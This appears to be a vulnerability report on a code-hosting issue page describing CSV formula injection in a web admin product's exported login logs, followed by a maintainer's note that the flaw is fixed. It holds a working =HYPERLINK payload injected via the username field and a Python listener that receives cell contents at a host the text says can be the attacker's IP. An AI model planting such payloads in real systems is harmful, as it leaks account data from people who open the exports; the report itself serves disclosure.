The product has the CSV injection vulnerability. For example, the CSV injection vulnerability is used to obtain login accounts.
When a user logs in, in the request of "/login", change the value of username to =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E") by burpsuite tool.


2.
Run the python script to start the HTTP service with port 8007.
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
data = {'result': 'this is a test'}
# You can change **localhost** to the IP address of the hacker's computer.
host = ('localhost', 8007)
class Resquest(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(data).encode())
if __name__ == '__main__':
server = HTTPServer(host, Resquest)
print("Starting server, listen at: %s:%s" % host)
server.serve_forever()
Choose "日志管理"->"登录日志" ("Log Management"->"Login Log") to view logs, and exporting .xlsx log file.

Open .xlsx log file, double-click the cell of =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). Then click an empty cell. And then click the cell of =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). In this case, a request is sent to the localhost:8007.
The contents of cells B2 and B3 are admin and test1.

Before double-click.

After double-click. And then click E.

A request is sent to the localhost:8007 through the browser.

5.
The HTTP service with port 8007 receives the following information:
127.0.0.1 - - [18/Jan/2022 17:04:07] "GET /?u=admintest1 HTTP/1.1" 200 -

So, we get user"admin"/"test1"/...
@sanlang 已修复,你可以更新一下代码。
导出Excel时屏蔽公式,防止CSV注入风险
https://gitee.com/y_project/RuoYi/commit/e9ebf86ac8a53bfc8475c7efad6f63a593eaefa9
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
登录 后才可以发表评论